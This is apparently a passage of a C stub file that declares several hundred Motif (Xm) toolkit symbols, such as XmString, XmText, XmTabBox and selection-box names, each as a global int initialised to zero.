int _XmSCUnitType = 0;
int _XmSCUnpostBehavior = 0;
int _XmSCUnselectPixmap = 0;
int _XmSCUpdateSliderSize = 0;
int _XmScursorBackground = 0;
int _XmScursorForeground = 0;
int _XmScursorPosition = 0;
int _XmScursorPositionVisible = 0;
int _XmSCUseAsyncGeometry = 0;
int _XmSCUserData = 0;
int _XmSCValidCursorForeground = 0;
int _XmSCValueChangedCallback = 0;
int _XmSCValueWcs = 0;
int _XmSCVerifyBell = 0;
int _XmSCVerticalAlignment = 0;
int _XmSCVerticalDimension = 0;
int _XmSCVerticalFontUnit = 0;
int _XmSCVerticalInt = 0;
int _XmSCVerticalPosition = 0;
int _XmSCVerticalScrollBar = 0;
int _XmSCVirtualBinding = 0;
int _XmSCVisibleItemCount = 0;
int _XmSCVisibleWhenOff = 0;
int _XmSCVisualPolicy = 0;
int _XmSCWhichButton = 0;
int _XmSCWordWrap = 0;
int _XmSCWorkWindow = 0;
int _XmSCXmBackgroundPixmap = 0;
int _XmSCXmFONTLIST_DEFAULT_TAG_STRING = 0;
int _XmSCXmString = 0;
int _XmSCXmStringCharSet = 0;
int _XmSCXmStringTable = 0;
int _XmSdarkThreshold = 0;
int _XmSdecimalPoints = 0;
int _XmSdecrementCallback = 0;
int _XmSdefaultActionCallback = 0;
int _XmSDEFAULT_BACKGROUND = 0;
int _XmSdefaultButton = 0;
int _XmSdefaultButtonShadowThickness = 0;
int _XmSdefaultButtonType = 0;
int _XmSdefaultCopyCursorIcon = 0;
int _XmSDEFAULT_FONT = 0;
int _XmSdefaultFontList = 0;
int _XmSdefaultInvalidCursorIcon = 0;
int _XmSdefaultLinkCursorIcon = 0;
int _XmSdefaultMoveCursorIcon = 0;
int _XmSdefaultNoneCursorIcon = 0;
int _XmSdefaultPosition = 0;
int _XmSdefaultSourceCursorIcon = 0;
int _XmSdefaultValidCursorIcon = 0;
int _XmSdeleteResponse = 0;
int _XmSdesktopParent = 0;
int _XmSdialogStyle = 0;
int _XmSdialogTitle = 0;
int _XmSdialogType = 0;
int _XmSdirectory = 0;
int _XmSdirectoryValid = 0;
int _XmSdirListItemCount = 0;
int _XmSdirListItems = 0;
int _XmSdirListLabelString = 0;
int _XmSdirMask = 0;
int _XmSdirSearchProc = 0;
int _XmSdirSpec = 0;
int _XmSdisarmCallback = 0;
int _XmSdoubleClickInterval = 0;
int _XmSdoubleSeparator = 0;
int _XmSdragCallback = 0;
int _XmSdragContextClass = 0;
int _XmSdragDropFinishCallback = 0;
int _XmSdragIconClass = 0;
int _XmSdragInitiatorProtocolStyle = 0;
int _XmSdragMotionCallback = 0;
int _XmSdragOperations = 0;
int _XmSdragOverMode = 0;
int _XmSdragProc = 0;
int _XmSdragReceiverProtocolStyle = 0;
int _XmSdropFinishCallback = 0;
int _XmSdropProc = 0;
int _XmSdropRectangles = 0;
int _XmSdropSiteActivity = 0;
int _XmSdropSiteEnterCallback = 0;
int _XmSdropSiteLeaveCallback = 0;
int _XmSdropSiteManagerClass = 0;
int _XmSdropSiteOperations = 0;
int _XmSdropSiteType = 0;
int _XmSdropStartCallback = 0;
int _XmSdropTransferClass = 0;
int _XmSdropTransfers = 0;
int _XmSearchColorCache = 0;
int _XmSecondaryResourceData = 0;
int _XmSeditable = 0;
int _XmSeditMode = 0;
int _XmSelectColorDefault = 0;
int _XmSelectioB_defaultTextAccelerators = 0;
int xmSelectionBoxClassRec = 0;
int _XmSelectionBoxCreateApplyButton = 0;
int _XmSelectionBoxCreateCancelButton = 0;
int _XmSelectionBoxCreateHelpButton = 0;
int _XmSelectionBoxCreateList = 0;
int _XmSelectionBoxCreateListLabel = 0;
int _XmSelectionBoxCreateOkButton = 0;
int _XmSelectionBoxCreateSelectionLabel = 0;
int _XmSelectionBoxCreateSeparator = 0;
int _XmSelectionBoxCreateText = 0;
int _XmSelectionBoxGeoMatrixCreate = 0;
int _XmSelectionBoxGetApplyLabelString = 0;
int _XmSelectionBoxGetCancelLabelString = 0;
int XmSelectionBoxGetChild = 0;
int _XmSelectionBoxGetHelpLabelString = 0;
int _XmSelectionBoxGetListItemCount = 0;
int _XmSelectionBoxGetListItems = 0;
int _XmSelectionBoxGetListLabelString = 0;
int _XmSelectionBoxGetListVisibleItemCount = 0;
int _XmSelectionBoxGetOkLabelString = 0;
int _XmSelectionBoxGetSelectionLabelString = 0;
int _XmSelectionBoxGetTextColumns = 0;
int _XmSelectionBoxGetTextString = 0;
int _XmSelectionBoxNoGeoRequest = 0;
int _XmSelectionBoxRestore = 0;
int _XmSelectionBoxUpOrDown = 0;
int xmSelectionBoxWidgetClass = 0;
int _XmSEMPTY_STRING = 0;
int _XmSendICCCallback = 0;
int _XmSentryAlignment = 0;
int _XmSentryBorder = 0;
int _XmSentryCallback = 0;
int _XmSentryClass = 0;
int _XmSentryVerticalAlignment = 0;
int _XmSeparatorCacheCompare = 0;
int xmSeparatorClassRec = 0;
int _XmSeparatorFix = 0;
int xmSeparatorGadgetClass = 0;
int xmSeparatorGadgetClassRec = 0;
int xmSeparatorGCacheObjClassRec = 0;
int xmSeparatorWidgetClass = 0;
int _XmSetActiveTabGroup = 0;
int _XmSetActualClass = 0;
int XmSetColorCalculation = 0;
int _XmSetDefaultBackgroundColorSpec = 0;
int _XmSetDestination = 0;
int _XmSetDragReceiverInfo = 0;
int _XmSetEtchedSlider = 0;
int _XmSetFocusFlag = 0;
int _XmSetFocusResetFlag = 0;
int XmSetFontUnit = 0;
int XmSetFontUnits = 0;
int _XmSetInDragMode = 0;
int _XmSetInitialOfTabGraph = 0;
int _XmSetInitialOfTabGroup = 0;
int _XmSetKidGeo = 0;
int _XmSetLastManagedMenuTime = 0;
int XmSetMenuCursor = 0;
int _XmSetMenuTraversal = 0;
int _XmSetPopupMenuClick = 0;
int XmSetProtocolHooks = 0;
int _XmSetRect = 0;
int _XmSetSwallowEventHandler = 0;
int _XmSetThickness = 0;
int _XmSetThicknessDefault0 = 0;
int XmSetToolTipString = 0;
int _XmSetTransientFlag = 0;
int _XmSetValuesOnChildren = 0;
int _XmSetXmDisplayClass = 0;
int _XmSexportTargets = 0;
int _XmSexposeCallback = 0;
int _XmSextendedSelectionCallback = 0;
int _XmSextensionType = 0;
int _XmSFAddNavigator = 0;
int _XmSfileListItemCount = 0;
int _XmSfileListItems = 0;
int _XmSfileListLabelString = 0;
int _XmSfileSearchProc = 0;
int _XmSfileTypeMask = 0;
int _XmSfillOnArm = 0;
int _XmSfillOnSelect = 0;
int _XmSfilterLabelString = 0;
int _XmSfocusCallback = 0;
int _XmSfocusMovedCallback = 0;
int _XmSfocusPolicyChanged = 0;
int _XmSfontList = 0;
int _XmSforegroundThreshold = 0;
int _XmSfractionBase = 0;
int _XmSFRemoveNavigator = 0;
int _XmSFUpdateNavigatorsValue = 0;
int _XmSgainPrimaryCallback = 0;
int xmShellExtClassRec = 0;
int xmShellExtObjectClass = 0;
int _XmShellIsExclusive = 0;
int _XmShelpCallback = 0;
int _XmShelpLabelString = 0;
int _XmShighlightColor = 0;
int _XmShighlightOnEnter = 0;
int _XmShighlightPixmap = 0;
int _XmShighlightThickness = 0;
int _XmShistoryItemCount = 0;
int _XmShistoryItems = 0;
int _XmShistoryMaxItems = 0;
int _XmShistoryVisibleItemCount = 0;
int _XmShorizontalFontUnit = 0;
int _XmShorizontalScrollBar = 0;
int _XmShorizontalSpacing = 0;
int _XmShotX = 0;
int _XmShotY = 0;
int _XmSiccHandle = 0;
int XmSimpleSpinBoxAddItem = 0;
int xmSimpleSpinBoxClassRec = 0;
int XmSimpleSpinBoxDeletePos = 0;
int XmSimpleSpinBoxSetItem = 0;
int xmSimpleSpinBoxWidgetClass = 0;
int _XmSimportTargets = 0;
int _XmSincrement = 0;
int _XmSincremental = 0;
int _XmSincrementCallback = 0;
int _XmSindicatorOn = 0;
int _XmSindicatorSize = 0;
int _XmSindicatorType = 0;
int _XmSinitialDelay = 0;
int _XmSinitialFocus = 0;
int _XmSinputCallback = 0;
int _XmSinputCreate = 0;
int _XmSinputMethod = 0;
int _XmSinvalidCursorForeground = 0;
int _XmSisAligned = 0;
int _XmSisHomogeneous = 0;
int _XmSitemCount = 0;
int _XmSitems = 0;
int _XmSkeyboardFocusPolicy = 0;
int _XmSlabelFontList = 0;
int _XmSlabelInsensitivePixmap = 0;
int _XmSlabelPixmap = 0;
int _XmSlabelString = 0;
int _XmSlabelType = 0;
int _XmSleep = 0;
int _XmSleftAttachment = 0;
int _XmSleftOffset = 0;
int _XmSleftPosition = 0;
int _XmSleftWidget = 0;
int xmSlideContextClassRec = 0;
int xmSlideContextWidgetClass = 0;
int _XmSlightThreshold = 0;
int _XmSlistItemCount = 0;
int _XmSlistItems = 0;
int _XmSlistLabelString = 0;
int _XmSlistMarginHeight = 0;
int _XmSlistMarginWidth = 0;
int _XmSlistSizePolicy = 0;
int _XmSlistSpacing = 0;
int _XmSlistUpdated = 0;
int _XmSlistVisibleItemCount = 0;
int _XmSlogicalParent = 0;
int _XmSlosePrimaryCallback = 0;
int _XmSlosingFocusCallback = 0;
int _XmSmainWindowMarginHeight = 0;
int _XmSmainWindowMarginWidth = 0;
int _XmSmapCallback = 0;
int _XmSmappingDelay = 0;
int _XmSmargin = 0;
int _XmSmarginBottom = 0;
int _XmSmarginHeight = 0;
int _XmSmarginLeft = 0;
int _XmSmarginRight = 0;
int _XmSmarginTop = 0;
int _XmSmarginWidth = 0;
int _XmSmask = 0;
int _XmSmaximum = 0;
int _XmSmaxLength = 0;
int _XmSmenuAccelerator = 0;
int _XmSmenuBar = 0;
int _XmSmenuCursor = 0;
int _XmSmenuHelpWidget = 0;
int _XmSmenuHistory = 0;
int _XmSmenuPost = 0;
int _XmSmessageAlignment = 0;
int _XmSmessageProc = 0;
int _XmSmessageString = 0;
int _XmSmessageWindow = 0;
int _XmSminimizeButtons = 0;
int _XmSminimum = 0;
int _XmSmnemonic = 0;
int _XmSmnemonicCharSet = 0;
int _XmSmodifyVerifyCallback = 0;
int _XmSmodifyVerifyCallbackWcs = 0;
int _XmSmotionVerifyCallback = 0;
int _XmSmoveOpaque = 0;
int _XmSmultiClick = 0;
int _XmSmultipleSelectionCallback = 0;
int _XmSmustMatch = 0;
int _XmSmwmDecorations = 0;
int _XmSmwmFunctions = 0;
int _XmSmwmInputMode = 0;
int _XmSmwmMenu = 0;
int _XmSmwmMessages = 0;
int _XmSnavigationType = 0;
int _XmSneedsMotion = 0;
int _XmSnoMatchCallback = 0;
int _XmSnoMatchString = 0;
int _XmSnoneCursorForeground = 0;
int _XmSnoResize = 0;
int _XmSnotifyProc = 0;
int _XmSnumColumns = 0;
int _XmSnumDropRectangles = 0;
int _XmSnumDropTransfers = 0;
int _XmSnumExportTargets = 0;
int _XmSnumImportTargets = 0;
int _XmSnumRectangles = 0;
int _XmSocorro = 0;
int _XmSoffsetX = 0;
int _XmSoffsetY = 0;
int _XmSokCallback = 0;
int _XmSokLabelString = 0;
int _XmSoperationChangedCallback = 0;
int _XmSoperationCursorIcon = 0;
int _XmSoptionLabel = 0;
int _XmSoptionMnemonic = 0;
int _XmSortResourceList = 0;
int _XmSosfActivate = 0;
int _XmSosfAddMode = 0;
int _XmSosfBackSpace = 0;
int _XmSosfBeginLine = 0;
int _XmSosfCancel = 0;
int _XmSosfClear = 0;
int _XmSosfCopy = 0;
int _XmSosfCut = 0;
int _XmSosfDelete = 0;
int _XmSosfDown = 0;
int _XmSosfEndLine = 0;
int _XmSosfHelp = 0;
int _XmSosfInsert = 0;
int _XmSosfLeft = 0;
int _XmSosfMenu = 0;
int _XmSosfMenuBar = 0;
int _XmSosfPageDown = 0;
int _XmSosfPageLeft = 0;
int _XmSosfPageRight = 0;
int _XmSosfPageUp = 0;
int _XmSosfPaste = 0;
int _XmSosfPrimaryPaste = 0;
int _XmSosfQuickPaste = 0;
int _XmSosfRight = 0;
int _XmSosfSelect = 0;
int _XmSosfUndo = 0;
int _XmSosfUp = 0;
int _XmSoutputCreate = 0;
int _XmSpacking = 0;
int _XmSpageDecrementCallback = 0;
int _XmSpageIncrement = 0;
int _XmSpageIncrementCallback = 0;
int _XmSpaneMaximum = 0;
int _XmSpaneMinimum = 0;
int _XmSpattern = 0;
int _XmSpendingDelete = 0;
int _XmSpinB_defaultAccelerators = 0;
int _XmSpinB_defaultTranslations = 0;
int xmSpinBoxClassRec = 0;
int XmSpinBoxValidatePosition = 0;
int xmSpinBoxWidgetClass = 0;
int _XmSpopupEnabled = 0;
int _XmSpositionIndex = 0;
int _XmSpostFromButton = 0;
int _XmSpostFromCount = 0;
int _XmSpostFromList = 0;
int _XmSpreeditType = 0;
int _XmSprocessingDirection = 0;
int _XmSpromptString = 0;
int _XmSprotocolCallback = 0;
int _XmSpushButton = 0;
int _XmSpushButtonEnabled = 0;
int _XmSqualifySearchDataProc = 0;
int _XmSradioAlwaysOne = 0;
int _XmSradioBehavior = 0;
int _XmSradioButton = 0;
int _XmSrealizeCallback = 0;
int _XmSrecomputeSize = 0;
int _XmSrectangles = 0;
int _XmSrefigureMode = 0;
int _XmSrepeatDelay = 0;
int _XmSresizable = 0;
int _XmSresizeCallback = 0;
int _XmSresizeHeight = 0;
int _XmSresizePolicy = 0;
int _XmSresizeWidth = 0;
int _XmSrightAttachment = 0;
int _XmSrightOffset = 0;
int _XmSrightPosition = 0;
int _XmSrightWidget = 0;
int _XmSrowColumnType = 0;
int _XmSrows = 0;
int _XmSrubberPositioning = 0;
int _XmSsashHeight = 0;
int _XmSsashIndent = 0;
int _XmSsashShadowThickness = 0;
int _XmSsashWidth = 0;
int _XmSscaleHeight = 0;
int _XmSscaleMultiple = 0;
int _XmSscaleWidth = 0;
int _XmSscrollBarDisplayPolicy = 0;
int _XmSscrollBarPlacement = 0;
int _XmSscrolledWindowMarginHeight = 0;
int _XmSscrolledWindowMarginWidth = 0;
int _XmSscrollHorizontal = 0;
int _XmSscrollingPolicy = 0;
int _XmSscrollLeftSide = 0;
int _XmSscrollTopSide = 0;
int _XmSscrollVertical = 0;
int _XmSselectColor = 0;
int _XmSselectedItemCount = 0;
int _XmSselectedItems = 0;
int _XmSselectInsensitivePixmap = 0;
int _XmSselectionArrayCount = 0;
int _XmSselectionLabelString = 0;
int _XmSselectionPolicy = 0;
int _XmSselectPixmap = 0;
int _XmSselectThreshold = 0;
int _XmSseparator = 0;
int _XmSseparatorOn = 0;
int _XmSseparatorType = 0;
int _XmSset = 0;
int _XmSshadow = 0;
int _XmSshadowThickness = 0;
int _XmSshadowType = 0;
int _XmSshellUnitType = 0;
int _XmSshowArrows = 0;
int _XmSshowAsDefault = 0;
int _XmSshowSeparator = 0;
int _XmSshowValue = 0;
int _XmSsimpleCallback = 0;
int _XmSsingleSelectionCallback = 0;
int _XmSsingleSeparator = 0;
int _XmSsizePolicy = 0;
int _XmSskipAdjust = 0;
int _XmSsliderSize = 0;
int _XmSsource = 0;
int _XmSsourceCursorIcon = 0;
int _XmSsourceIsExternal = 0;
int _XmSsourcePixmapIcon = 0;
int _XmSsourceWidget = 0;
int _XmSsourceWindow = 0;
int _XmSspacing = 0;
int _XmSstartTime = 0;
int _XmSstateCursorIcon = 0;
int _XmSstringDirection = 0;
int _XmSsubMenuId = 0;
int _XmSsymbolPixmap = 0;
int _XmStackFree = 0;
int _XmStackInit = 0;
int _XmStackPop = 0;
int _XmStackPush = 0;
int xm_std_constraint_filter = 0;
int xm_std_filter = 0;
int _XmStearOffMenuActivateCallback = 0;
int _XmStearOffMenuDeactivateCallback = 0;
int _XmStearOffModel = 0;
int _XmStextAccelerators = 0;
int _XmStextColumns = 0;
int _XmStextFontList = 0;
int _XmStextString = 0;
int _XmStextTranslations = 0;
int _XmStextValue = 0;
int _XmStitleString = 0;
int _XmStoBottomCallback = 0;
int _XmStopAttachment = 0;
int _XmStopCharacter = 0;
int _XmStopItemPosition = 0;
int _XmStopLevelEnterCallback = 0;
int _XmStopLevelLeaveCallback = 0;
int _XmStopOffset = 0;
int _XmStoPositionCallback = 0;
int _XmStopPosition = 0;
int _XmStopShadowColor = 0;
int _XmStopShadowPixmap = 0;
int _XmStopWidget = 0;
int _XmStoTopCallback = 0;
int _XmStransferProc = 0;
int _XmStransferStatus = 0;
int _XmStraversalCallback = 0;
int _XmStraversalOn = 0;
int _XmStraversalType = 0;
int _XmStraverseObscuredCallback = 0;
int _XmStreeUpdateProc = 0;
int _XmStringBaseline = 0;
int XmStringBaseline = 0;
int _XmStringByteCompare = 0;
int XmStringByteCompare = 0;
int XmStringByteStreamLength = 0;
int _XmStringCacheFree = 0;
int _XmStringCacheGet = 0;
int _XmStringCacheTag = 0;
int _XmStringCharacterCount = 0;
int XmStringCompare = 0;
int XmStringComponentCreate = 0;
int XmStringConcat = 0;
int XmStringConcatAndFree = 0;
int _XmStringContextCopy = 0;
int _XmStringContextFree = 0;
int _XmStringContextReInit = 0;
int _XmStringCopy = 0;
int XmStringCopy = 0;
int _XmStringCreate = 0;
int XmStringCreate = 0;
int _XmStringCreateExternal = 0;
int XmStringCreateFontList = 0;
int XmStringCreateFontList_r = 0;
int XmStringCreateLocalized = 0;
int XmStringCreateLtoR = 0;
int XmStringCreateSimple = 0;
int XmStringDirectionCreate = 0;
int XmStringDirectionToDirection = 0;
int _XmStringDraw = 0;
int XmStringDraw = 0;
int _XmStringDrawImage = 0;
int XmStringDrawImage = 0;
int _XmStringDrawLining = 0;
int _XmStringDrawMnemonic = 0;
int _XmStringDrawSegment = 0;
int _XmStringDrawUnderline = 0;
int XmStringDrawUnderline = 0;
int _XmStringEmpty = 0;
int XmStringEmpty = 0;
int _XmStringEntryCopy = 0;
int _XmStringEntryFree = 0;
int _XmStringExtent = 0;
int XmStringExtent = 0;
int _XmStringFree = 0;
int XmStringFree = 0;
int _XmStringFreeContext = 0;
int XmStringFreeContext = 0;
int XmStringGenerate = 0;
int _XmStringGetBaselines = 0;
int _XmStringGetCurrentCharset = 0;
int XmStringGetLtoR = 0;
int XmStringGetNextComponent = 0;
int _XmStringGetNextSegment = 0;
int XmStringGetNextSegment = 0;
int _XmStringGetNextTabWidth = 0;
int XmStringGetNextTriple = 0;
int _XmStringGetSegment = 0;
int _XmStringGetTextConcat = 0;
int _XmStringHasSubstring = 0;
int XmStringHasSubstring = 0;
int _XmStringHeight = 0;
int XmStringHeight = 0;
int _XmStringIndexCacheTag = 0;
int _XmStringIndexGetTag = 0;
int _XmStringInitContext = 0;
int XmStringInitContext = 0;
int _XmStringIsCurrentCharset = 0;
int XmStringIsVoid = 0;
int _XmStringIsXmString = 0;
int _XmStringLayout = 0;
int XmStringLength = 0;
int _XmStringLineCount = 0;
int XmStringLineCount = 0;
int XmStringLtoRCreate = 0;
int XmStringNConcat = 0;
int XmStringNCopy = 0;
int _XmStringNCreate = 0;
int _XmStringOptToNonOpt = 0;
int XmStringParseText = 0;
int XmStringPeekNextComponent = 0;
int XmStringPeekNextTriple = 0;
int XmStringPutRendition = 0;
int _XmStringRender = 0;
int _XmStrings = 0;
int _XmStrings22 = 0;
int _XmStrings23 = 0;
int _XmStringsAreEqual = 0;
int XmStringSegmentCreate = 0;
int _XmStringSegmentExtents = 0;
int _XmStringSegmentNew = 0;
int XmStringSeparatorCreate = 0;
int _XmStringsI = 0;
int _XmStringSingleSegment = 0;
int _XmStringSourceCreate = 0;
int _XmStringSourceDestroy = 0;
int _XmStringSourceFindString = 0;
int _XmStringSourceGetEditable = 0;
int _XmStringSourceGetMaxLength = 0;
int _XmStringSourceGetPending = 0;
int _XmStringSourceGetString = 0;
int _XmStringSourceGetValue = 0;
int _XmStringSourceHasSelection = 0;
int _XmStringSourceSetEditable = 0;
int _XmStringSourceSetGappedBuffer = 0;
int _XmStringSourceSetMaxLength = 0;
int _XmStringSourceSetPending = 0;
int _XmStringSourceSetValue = 0;
int XmStringTableParseStringArray = 0;
int XmStringTableProposeTablist = 0;
int XmStringTableToXmString = 0;
int XmStringTableUnparse = 0;
int XmStringToXmStringTable = 0;
int _XmStringTruncateASN1 = 0;
int _XmStringUngenerate = 0;
int XmStringUnparse = 0;
int _XmStringUpdate = 0;
int _XmStringUpdateWMShellTitle = 0;
int _XmStringWidth = 0;
int XmStringWidth = 0;
int _XmStroughColor = 0;
int _XmSunitType = 0;
int _XmSunmapCallback = 0;
int _XmSunpostBehavior = 0;
int _XmSunselectPixmap = 0;
int _XmSupdateSliderSize = 0;
int _XmSuseAsyncGeometry = 0;
int _XmSuserData = 0;
int _XmSvalidCursorForeground = 0;
int _XmSvalueChangedCallback = 0;
int _XmSvalueWcs = 0;
int _XmSverifyBell = 0;
int _XmSverticalFontUnit = 0;
int _XmSverticalScrollBar = 0;
int _XmSverticalSpacing = 0;
int _XmSvisibleItemCount = 0;
int _XmSvisibleWhenOff = 0;
int _XmSvisualPolicy = 0;
int _XmSWGetClipArea = 0;
int _XmSwhichButton = 0;
int _XmSWNotifyGeoChange = 0;
int _XmSwordWrap = 0;
int _XmSworkWindow = 0;
int _XmSyncDropSiteTree = 0;
int XmTabAttributesFree = 0;
int XmTabbedStackListAppend = 0;
int _XmTabbedStackListArray = 0;
int XmTabbedStackListCompare = 0;
int XmTabbedStackListCopy = 0;
int _XmTabbedStackListCount = 0;
int XmTabbedStackListCreate = 0;
int XmTabbedStackListFind = 0;
int XmTabbedStackListFree = 0;
int _XmTabbedStackListGet = 0;
int XmTabbedStackListInsert = 0;
int XmTabbedStackListModify = 0;
int XmTabbedStackListQuery = 0;
int XmTabbedStackListRemove = 0;
int XmTabbedStackListSimpleAppend = 0;
int XmTabbedStackListSimpleInsert = 0;
int XmTabbedStackListSimpleModify = 0;
int XmTabbedStackListSimpleQuery = 0;
int XmTabbedStackListSimpleRemove = 0;
int _XmTabBoxCanvas = 0;
int xmTabBoxClassRec = 0;
int XmTabBoxGetIndex = 0;
int _XmTabBoxGetMaxTabHeight = 0;
int _XmTabBoxGetMaxTabWidth = 0;
int XmTabBoxGetNumColumns = 0;
int XmTabBoxGetNumRows = 0;
int _XmTabBoxGetNumRowsColumns = 0;
int XmTabBoxGetNumTabs = 0;
int _XmTabBoxGetTabHeight = 0;
int XmTabBoxGetTabRow = 0;
int _XmTabBoxGetTabWidth = 0;
int _XmTabBoxSelectTab = 0;
int _XmTabBoxStackedGeometry = 0;
int xmTabBoxWidgetClass = 0;
int XmTabBoxXYToIndex = 0;
int xmTabCanvasClassRec = 0;
int xmTabCanvasWidgetClass = 0;
int _XmTabCopy = 0;
int XmTabCreate = 0;
int XmTabFree = 0;
int XmTabGetValues = 0;
int _XmTabListAdd = 0;
int XmTabListCopy = 0;
int _XmTabListDelete = 0;
int XmTabListFree = 0;
int _XmTabListGetPosition = 0;
int XmTabListGetTab = 0;
int XmTabListInsertTabs = 0;
int XmTabListRemoveTabs = 0;
int XmTabListReplacePositions = 0;
int XmTabListTabCount = 0;
int XmTabSetValue = 0;
int xmTabStackClassRec = 0;
int XmTabStackGetSelectedTab = 0;
int XmTabStackIndexToWidget = 0;
int XmTabStackSelectTab = 0;
int xmTabStackWidgetClass = 0;
int XmTargetsAreCompatible = 0;
int _XmTargetsToIndex = 0;
int _XmTearOffB_overrideTranslations = 0;
int _XmTearOffBPrimClassExtRec = 0;
int _XmTearOffBtnDownEventHandler = 0;
int _XmTearOffBtnUpEventHandler = 0;
int xmTearOffButtonClassRec = 0;
int xmTearOffButtonWidgetClass = 0;
int _XmTearOffInitiate = 0;
int _XmTestTraversability = 0;
int _XmTextAdjustGC = 0;
int _XmTextBytesToCharacters = 0;
int _XmTextChangeBlinkBehavior = 0;
int _XmTextChangeHOffset = 0;
int _XmTextChangeVOffset = 0;
int _XmTextCharactersToBytes = 0;
int xmTextClassRec = 0;
int _XmTextClearDestination = 0;
int XmTextClearSelection = 0;
int _XmTextConvert = 0;
int XmTextCopy = 0;
int XmTextCopyLink = 0;
int _XmTextCountCharacters = 0;
int XmTextCut = 0;
int _XmTextDestinationVisible = 0;
int _XmTextDisableRedisplay = 0;
int XmTextDisableRedisplay = 0;
int _XmTextDrawDestination = 0;
int _XmTextEnableRedisplay = 0;
int XmTextEnableRedisplay = 0;
int _XmTextEventBindings1 = 0;
int _XmTextEventBindings2 = 0;
int _XmTextEventBindings3 = 0;
int _XmTextF_EventBindings1 = 0;
int _XmTextF_EventBindings2 = 0;
int _XmTextF_EventBindings3 = 0;
int xmTextFieldClassRec = 0;
int XmTextFieldClearSelection = 0;
int _XmTextFieldConvert = 0;
int XmTextFieldCopy = 0;
int XmTextFieldCopyLink = 0;
int _XmTextFieldCountBytes = 0;
int _XmTextFieldCountCharacters = 0;
int XmTextFieldCut = 0;
int _XmTextFieldDeselectSelection = 0;
int _XmTextFieldDestinationVisible = 0;
int _XmTextFieldDrawInsertionPoint = 0;
int XmTextFieldGetAddMode = 0;
int XmTextFieldGetBaseline = 0;
int XmTextFieldGetBaseLine = 0;
int XmTextFieldGetCursorPosition = 0;
int _XmTextFieldGetDropReciever = 0;
int XmTextFieldGetEditable = 0;
int XmTextFieldGetInsertionPosition = 0;
int XmTextFieldGetLastPosition = 0;
int XmTextFieldGetMaxLength = 0;
int XmTextFieldGetSelection = 0;
int XmTextFieldGetSelectionPosition = 0;
int XmTextFieldGetSelectionWcs = 0;
int XmTextFieldGetString = 0;
int XmTextFieldGetStringWcs = 0;
int XmTextFieldGetSubstring = 0;
int XmTextFieldGetSubstringWcs = 0;
int _XmTextFieldHandleSecondaryFinished = 0;
int XmTextFieldInsert = 0;
int XmTextFieldInsertWcs = 0;
int _XmTextFieldInstallTransferTrait = 0;
int _XmTextFieldLoseSelection = 0;
int XmTextFieldPaste = 0;
int XmTextFieldPasteLink = 0;
int XmTextFieldPosToXY = 0;
int XmTextFieldRemove = 0;
int XmTextFieldReplace = 0;
int _XmTextFieldReplaceText = 0;
int XmTextFieldReplaceWcs = 0;
int XmTextFieldSetAddMode = 0;
int _XmTextFieldSetClipRect = 0;
int _XmTextFieldSetCursorPosition = 0;
int XmTextFieldSetCursorPosition = 0;
int _XmTextFieldSetDestination = 0;
int XmTextFieldSetEditable = 0;
int XmTextFieldSetHighlight = 0;
int XmTextFieldSetInsertionPosition = 0;
int XmTextFieldSetMaxLength = 0;
int _XmTextFieldSetSel2 = 0;
int XmTextFieldSetSelection = 0;
int XmTextFieldSetString = 0;
int XmTextFieldSetStringWcs = 0;
int XmTextFieldShowPosition = 0;
int _XmTextFieldStartSelection = 0;
int xmTextFieldWidgetClass = 0;
int XmTextFieldXYToPos = 0;
int _XmTextFindLineEnd = 0;
int _XmTextFindScroll = 0;
int XmTextFindString = 0;
int _XmTextFindStringBackwards = 0;
int _XmTextFindStringForwards = 0;
int XmTextFindStringWcs = 0;
int _XmTextFPrimClassExtRec = 0;
int _XmTextFreeContextData = 0;
int _XmTextFToggleCursorGC = 0;
int XmTextGetAddMode = 0;
int _XmTextGetAnchor = 0;
int XmTextGetBaseline = 0;
int _XmTextGetBaseLine = 0;
int XmTextGetBaseLine = 0;
int _XmTextGetBaselines = 0;
int XmTextGetCenterline = 0;
int XmTextGetCursorPosition = 0;
int _XmTextGetDisplayRect = 0;
int _XmTextGetDropReciever = 0;
int XmTextGetEditable = 0;
int XmTextGetInsertionPosition = 0;
int XmTextGetLastPosition = 0;
int _XmTextGetLineTable = 0;
int XmTextGetMaxLength = 0;
int _XmTextGetNumberLines = 0;
int _XmTextGetSel2 = 0;
int XmTextGetSelection = 0;
int XmTextGetSelectionPosition = 0;
int XmTextGetSelectionWcs = 0;
int XmTextGetSource = 0;
int XmTextGetString = 0;
int XmTextGetStringWcs = 0;
int XmTextGetSubstring = 0;
int XmTextGetSubstringWcs = 0;
int _XmTextGetTableIndex = 0;
int XmTextGetTopCharacter = 0;
int _XmTextGetTotalLines = 0;
int _XmTextHandleSecondaryFinished = 0;
int _XmTextHasDestination = 0;
int _XmTextInputCreate = 0;
int _XmTextInputGetSecResData = 0;
int XmTextInsert = 0;
int XmTextInsertWcs = 0;
int _XmTextInstallTransferTrait = 0;
int _XmTextInvalidate = 0;
int _XmTextIn_XmTextEventBindings1 = 0;
int _XmTextIn_XmTextEventBindings2 = 0;
int _XmTextIn_XmTextEventBindings3 = 0;
int _XmTextIn_XmTextVEventBindings = 0;
int _XmTextLineInfo = 0;
int _XmTextLoseSelection = 0;
int _XmTextMarginsProc = 0;
int _XmTextMarkRedraw = 0;
int _XmTextModifyVerify = 0;
int _XmTextMovingCursorPosition = 0;
int _XmTextNeedsPendingDeleteDis = 0;
int _XmTextNumLines = 0;
int _XmTextOutLoadGCsAndRecolorCursors = 0;
int _XmTextOutputCreate = 0;
int _XmTextOutputGetSecResData = 0;
int XmTextPaste = 0;
int XmTextPasteLink = 0;
int _XmTextPosToLine = 0;
int XmTextPosToXY = 0;
int _XmTextPrimClassExtRec = 0;
int _XmTextRealignLineTable = 0;
int XmTextRemove = 0;
int _XmTextReplace = 0;
int XmTextReplace = 0;
int XmTextReplaceWcs = 0;
int _XmTextResetClipOrigin = 0;
int _XmTextResetIC = 0;
int XmTextScroll = 0;
int _XmTextScrollable = 0;
int XmTextSetAddMode = 0;
int _XmTextSetCursorPosition = 0;
int XmTextSetCursorPosition = 0;
int _XmTextSetDestinationSelection = 0;
int _XmTextSetEditable = 0;
int XmTextSetEditable = 0;
int _XmTextSetHighlight = 0;
int XmTextSetHighlight = 0;
int XmTextSetInsertionPosition = 0;
int XmTextSetMaxLength = 0;
int _XmTextSetPreeditPosition = 0;
int _XmTextSetSel2 = 0;
int XmTextSetSelection = 0;
int XmTextSetSource = 0;
int XmTextSetString = 0;
int XmTextSetStringWcs = 0;
int _XmTextSetTopCharacter = 0;
int XmTextSetTopCharacter = 0;
int _XmTextShouldWordWrap = 0;
int _XmTextShowPosition = 0;
int XmTextShowPosition = 0;
